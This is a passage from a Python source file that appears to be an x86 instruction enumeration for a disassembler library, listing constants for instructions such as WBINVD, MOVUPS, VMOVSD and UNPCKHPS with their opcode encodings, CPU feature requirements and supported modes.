``16/32/64-bit``
"""
WBINVD: int = 876
"""
``WBINVD``
``0F 09``
``486+``
``16/32/64-bit``
"""
WBNOINVD: int = 877
"""
``WBNOINVD``
``F3 0F 09``
``WBNOINVD``
``16/32/64-bit``
"""
CL1INVMB: int = 878
"""
``CL1INVMB``
``0F 0A``
``CL1INVMB``
``16/32-bit``
"""
UD2: int = 879
"""
``UD2``
``0F 0B``
``286+``
``16/32/64-bit``
"""
RESERVEDNOP_RM16_R16_0F0D: int = 880
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 0D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F0D: int = 881
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 0D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F0D: int = 882
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 0D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
PREFETCH_M8: int = 883
"""
``PREFETCH m8``
``0F 0D /0``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHW_M8: int = 884
"""
``PREFETCHW m8``
``0F 0D /1``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHWT1_M8: int = 885
"""
``PREFETCHWT1 m8``
``0F 0D /2``
``PREFETCHWT1``
``16/32/64-bit``
"""
FEMMS: int = 886
"""
``FEMMS``
``0F 0E``
``3DNOW``
``16/32/64-bit``
"""
UMOV_RM8_R8: int = 887
"""
``UMOV r/m8, r8``
``0F 10 /r``
``386/486``
``16/32-bit``
"""
UMOV_RM16_R16: int = 888
"""
``UMOV r/m16, r16``
``o16 0F 11 /r``
``386/486``
``16/32-bit``
"""
UMOV_RM32_R32: int = 889
"""
``UMOV r/m32, r32``
``o32 0F 11 /r``
``386/486``
``16/32-bit``
"""
UMOV_R8_RM8: int = 890
"""
``UMOV r8, r/m8``
``0F 12 /r``
``386/486``
``16/32-bit``
"""
UMOV_R16_RM16: int = 891
"""
``UMOV r16, r/m16``
``o16 0F 13 /r``
``386/486``
``16/32-bit``
"""
UMOV_R32_RM32: int = 892
"""
``UMOV r32, r/m32``
``o32 0F 13 /r``
``386/486``
``16/32-bit``
"""
MOVUPS_XMM_XMMM128: int = 893
"""
``MOVUPS xmm1, xmm2/m128``
``NP 0F 10 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVUPS_XMM_XMMM128: int = 894
"""
``VMOVUPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPS_YMM_YMMM256: int = 895
"""
``VMOVUPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPS_XMM_K1Z_XMMM128: int = 896
"""
``VMOVUPS xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.0F.W0 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_YMM_K1Z_YMMM256: int = 897
"""
``VMOVUPS ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.0F.W0 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_ZMM_K1Z_ZMMM512: int = 898
"""
``VMOVUPS zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.0F.W0 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVUPD_XMM_XMMM128: int = 899
"""
``MOVUPD xmm1, xmm2/m128``
``66 0F 10 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVUPD_XMM_XMMM128: int = 900
"""
``VMOVUPD xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPD_YMM_YMMM256: int = 901
"""
``VMOVUPD ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPD_XMM_K1Z_XMMM128: int = 902
"""
``VMOVUPD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W1 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_YMM_K1Z_YMMM256: int = 903
"""
``VMOVUPD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W1 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_ZMM_K1Z_ZMMM512: int = 904
"""
``VMOVUPD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W1 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSS_XMM_XMMM32: int = 905
"""
``MOVSS xmm1, xmm2/m32``
``F3 0F 10 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVSS_XMM_XMM_XMM: int = 906
"""
``VMOVSS xmm1, xmm2, xmm3``
``VEX.LIG.F3.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSS_XMM_M32: int = 907
"""
``VMOVSS xmm1, m32``
``VEX.LIG.F3.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSS_XMM_K1Z_XMM_XMM: int = 908
"""
``VMOVSS xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.0F.W0 10 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSS_XMM_K1Z_M32: int = 909
"""
``VMOVSS xmm1 {k1}{z}, m32``
``EVEX.LIG.F3.0F.W0 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSD_XMM_XMMM64: int = 910
"""
``MOVSD xmm1, xmm2/m64``
``F2 0F 10 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVSD_XMM_XMM_XMM: int = 911
"""
``VMOVSD xmm1, xmm2, xmm3``
``VEX.LIG.F2.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSD_XMM_M64: int = 912
"""
``VMOVSD xmm1, m64``
``VEX.LIG.F2.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSD_XMM_K1Z_XMM_XMM: int = 913
"""
``VMOVSD xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F2.0F.W1 10 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSD_XMM_K1Z_M64: int = 914
"""
``VMOVSD xmm1 {k1}{z}, m64``
``EVEX.LIG.F2.0F.W1 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVUPS_XMMM128_XMM: int = 915
"""
``MOVUPS xmm2/m128, xmm1``
``NP 0F 11 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVUPS_XMMM128_XMM: int = 916
"""
``VMOVUPS xmm2/m128, xmm1``
``VEX.128.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPS_YMMM256_YMM: int = 917
"""
``VMOVUPS ymm2/m256, ymm1``
``VEX.256.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPS_XMMM128_K1Z_XMM: int = 918
"""
``VMOVUPS xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.0F.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_YMMM256_K1Z_YMM: int = 919
"""
``VMOVUPS ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.0F.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_ZMMM512_K1Z_ZMM: int = 920
"""
``VMOVUPS zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.0F.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVUPD_XMMM128_XMM: int = 921
"""
``MOVUPD xmm2/m128, xmm1``
``66 0F 11 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVUPD_XMMM128_XMM: int = 922
"""
``VMOVUPD xmm2/m128, xmm1``
``VEX.128.66.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPD_YMMM256_YMM: int = 923
"""
``VMOVUPD ymm2/m256, ymm1``
``VEX.256.66.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPD_XMMM128_K1Z_XMM: int = 924
"""
``VMOVUPD xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W1 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_YMMM256_K1Z_YMM: int = 925
"""
``VMOVUPD ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W1 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_ZMMM512_K1Z_ZMM: int = 926
"""
``VMOVUPD zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W1 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSS_XMMM32_XMM: int = 927
"""
``MOVSS xmm2/m32, xmm1``
``F3 0F 11 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVSS_XMM_XMM_XMM_0F11: int = 928
"""
``VMOVSS xmm1, xmm2, xmm3``
``VEX.LIG.F3.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSS_M32_XMM: int = 929
"""
``VMOVSS m32, xmm1``
``VEX.LIG.F3.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSS_XMM_K1Z_XMM_XMM_0F11: int = 930
"""
``VMOVSS xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.0F.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSS_M32_K1_XMM: int = 931
"""
``VMOVSS m32 {k1}, xmm1``
``EVEX.LIG.F3.0F.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSD_XMMM64_XMM: int = 932
"""
``MOVSD xmm1/m64, xmm2``
``F2 0F 11 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVSD_XMM_XMM_XMM_0F11: int = 933
"""
``VMOVSD xmm1, xmm2, xmm3``
``VEX.LIG.F2.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSD_M64_XMM: int = 934
"""
``VMOVSD m64, xmm1``
``VEX.LIG.F2.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSD_XMM_K1Z_XMM_XMM_0F11: int = 935
"""
``VMOVSD xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F2.0F.W1 11 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSD_M64_K1_XMM: int = 936
"""
``VMOVSD m64 {k1}, xmm1``
``EVEX.LIG.F2.0F.W1 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHLPS_XMM_XMM: int = 937
"""
``MOVHLPS xmm1, xmm2``
``NP 0F 12 /r``
``SSE``
``16/32/64-bit``
"""
MOVLPS_XMM_M64: int = 938
"""
``MOVLPS xmm1, m64``
``NP 0F 12 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVHLPS_XMM_XMM_XMM: int = 939
"""
``VMOVHLPS xmm1, xmm2, xmm3``
``VEX.128.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVLPS_XMM_XMM_M64: int = 940
"""
``VMOVLPS xmm2, xmm1, m64``
``VEX.128.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHLPS_XMM_XMM_XMM: int = 941
"""
``VMOVHLPS xmm1, xmm2, xmm3``
``EVEX.128.0F.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVLPS_XMM_XMM_M64: int = 942
"""
``VMOVLPS xmm2, xmm1, m64``
``EVEX.128.0F.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLPD_XMM_M64: int = 943
"""
``MOVLPD xmm1, m64``
``66 0F 12 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVLPD_XMM_XMM_M64: int = 944
"""
``VMOVLPD xmm2, xmm1, m64``
``VEX.128.66.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLPD_XMM_XMM_M64: int = 945
"""
``VMOVLPD xmm2, xmm1, m64``
``EVEX.128.66.0F.W1 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSLDUP_XMM_XMMM128: int = 946
"""
``MOVSLDUP xmm1, xmm2/m128``
``F3 0F 12 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VMOVSLDUP_XMM_XMMM128: int = 947
"""
``VMOVSLDUP xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSLDUP_YMM_YMMM256: int = 948
"""
``VMOVSLDUP ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSLDUP_XMM_K1Z_XMMM128: int = 949
"""
``VMOVSLDUP xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSLDUP_YMM_K1Z_YMMM256: int = 950
"""
``VMOVSLDUP ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSLDUP_ZMM_K1Z_ZMMM512: int = 951
"""
``VMOVSLDUP zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVDDUP_XMM_XMMM64: int = 952
"""
``MOVDDUP xmm1, xmm2/m64``
``F2 0F 12 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VMOVDDUP_XMM_XMMM64: int = 953
"""
``VMOVDDUP xmm1, xmm2/m64``
``VEX.128.F2.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDDUP_YMM_YMMM256: int = 954
"""
``VMOVDDUP ymm1, ymm2/m256``
``VEX.256.F2.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDDUP_XMM_K1Z_XMMM64: int = 955
"""
``VMOVDDUP xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.F2.0F.W1 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDDUP_YMM_K1Z_YMMM256: int = 956
"""
``VMOVDDUP ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F2.0F.W1 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDDUP_ZMM_K1Z_ZMMM512: int = 957
"""
``VMOVDDUP zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F2.0F.W1 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLPS_M64_XMM: int = 958
"""
``MOVLPS m64, xmm1``
``NP 0F 13 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVLPS_M64_XMM: int = 959
"""
``VMOVLPS m64, xmm1``
``VEX.128.0F.WIG 13 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLPS_M64_XMM: int = 960
"""
``VMOVLPS m64, xmm1``
``EVEX.128.0F.W0 13 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLPD_M64_XMM: int = 961
"""
``MOVLPD m64, xmm1``
``66 0F 13 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVLPD_M64_XMM: int = 962
"""
``VMOVLPD m64, xmm1``
``VEX.128.66.0F.WIG 13 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLPD_M64_XMM: int = 963
"""
``VMOVLPD m64, xmm1``
``EVEX.128.66.0F.W1 13 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKLPS_XMM_XMMM128: int = 964
"""
``UNPCKLPS xmm1, xmm2/m128``
``NP 0F 14 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VUNPCKLPS_XMM_XMM_XMMM128: int = 965
"""
``VUNPCKLPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKLPS_YMM_YMM_YMMM256: int = 966
"""
``VUNPCKLPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKLPS_XMM_K1Z_XMM_XMMM128B32: int = 967
"""
``VUNPCKLPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPS_YMM_K1Z_YMM_YMMM256B32: int = 968
"""
``VUNPCKLPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 969
"""
``VUNPCKLPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 14 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKLPD_XMM_XMMM128: int = 970
"""
``UNPCKLPD xmm1, xmm2/m128``
``66 0F 14 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VUNPCKLPD_XMM_XMM_XMMM128: int = 971
"""
``VUNPCKLPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKLPD_YMM_YMM_YMMM256: int = 972
"""
``VUNPCKLPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKLPD_XMM_K1Z_XMM_XMMM128B64: int = 973
"""
``VUNPCKLPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPD_YMM_K1Z_YMM_YMMM256B64: int = 974
"""
``VUNPCKLPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 975
"""
``VUNPCKLPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 14 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKHPS_XMM_XMMM128: int = 976
"""
``UNPCKHPS xmm1, xmm2/m128``
``NP 0F 15 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VUNPCKHPS_XMM_XMM_XMMM128: int = 977
"""
``VUNPCKHPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKHPS_YMM_YMM_YMMM256: int = 978
"""
``VUNPCKHPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKHPS_XMM_K1Z_XMM_XMMM128B32: int = 979
"""
``VUNPCKHPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPS_YMM_K1Z_YMM_YMMM256B32: int = 980
"""
``VUNPCKHPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 981
"""
``VUNPCKHPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 15 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKHPD_XMM_XMMM128: int = 982
"""
``UNPCKHPD xmm1, xmm2/m128``
``66 0F 15 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VUNPCKHPD_XMM_XMM_XMMM128: int = 983
"""
``VUNPCKHPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKHPD_YMM_YMM_YMMM256: int = 984
"""
``VUNPCKHPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKHPD_XMM_K1Z_XMM_XMMM128B64: int = 985
"""
``VUNPCKHPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPD_YMM_K1Z_YMM_YMMM256B64: int = 986
"""
``VUNPCKHPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 987
"""
``VUNPCKHPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 15 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLHPS_XMM_XMM: int = 988
"""
``MOVLHPS xmm1, xmm2``
``NP 0F 16 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVLHPS_XMM_XMM_XMM: int = 989
"""
``VMOVLHPS xmm1, xmm2, xmm3``
``VEX.128.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLHPS_XMM_XMM_XMM: int = 990
"""
``VMOVLHPS xmm1, xmm2, xmm3``
``EVEX.128.0F.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPS_XMM_M64: int = 991
"""
``MOVHPS xmm1, m64``
``NP 0F 16 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVHPS_XMM_XMM_M64: int = 992
"""
``VMOVHPS xmm2, xmm1, m64``
``VEX.128.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPS_XMM_XMM_M64: int = 993
"""
``VMOVHPS xmm2, xmm1, m64``
``EVEX.128.0F.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPD_XMM_M64: int = 994
"""
``MOVHPD xmm1, m64``
``66 0F 16 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVHPD_XMM_XMM_M64: int = 995
"""
``VMOVHPD xmm2, xmm1, m64``
``VEX.128.66.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPD_XMM_XMM_M64: int = 996
"""
``VMOVHPD xmm2, xmm1, m64``
``EVEX.128.66.0F.W1 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSHDUP_XMM_XMMM128: int = 997
"""
``MOVSHDUP xmm1, xmm2/m128``
``F3 0F 16 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VMOVSHDUP_XMM_XMMM128: int = 998
"""
``VMOVSHDUP xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSHDUP_YMM_YMMM256: int = 999
"""
``VMOVSHDUP ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSHDUP_XMM_K1Z_XMMM128: int = 1000
"""
``VMOVSHDUP xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W0 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSHDUP_YMM_K1Z_YMMM256: int = 1001
"""
``VMOVSHDUP ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W0 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSHDUP_ZMM_K1Z_ZMMM512: int = 1002
"""
``VMOVSHDUP zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPS_M64_XMM: int = 1003
"""
``MOVHPS m64, xmm1``
``NP 0F 17 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVHPS_M64_XMM: int = 1004
"""
``VMOVHPS m64, xmm1``
``VEX.128.0F.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPS_M64_XMM: int = 1005
"""
``VMOVHPS m64, xmm1``
``EVEX.128.0F.W0 17 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPD_M64_XMM: int = 1006
"""
``MOVHPD m64, xmm1``
``66 0F 17 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVHPD_M64_XMM: int = 1007
"""
``VMOVHPD m64, xmm1``
``VEX.128.66.0F.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPD_M64_XMM: int = 1008
"""
``VMOVHPD m64, xmm1``
``EVEX.128.66.0F.W1 17 /r``
``AVX512F``
``16/32/64-bit``
"""
RESERVEDNOP_RM16_R16_0F18: int = 1009
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 18 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F18: int = 1010
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 18 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F18: int = 1011
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 18 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F19: int = 1012
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 19 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F19: int = 1013
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 19 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F19: int = 1014
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 19 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1A: int = 1015
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1A /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1A: int = 1016
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1A /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1A: int = 1017
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1A /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1B: int = 1018
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1B /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1B: int = 1019
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1B /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1B: int = 1020
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1B /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1C: int = 1021
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1C /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1C: int = 1022
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1C /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1C: int = 1023
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1C /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1D: int = 1024
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1D: int = 1025
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1D: int = 1026
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1E: int = 1027
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1E /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1E: int = 1028
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1E /r``
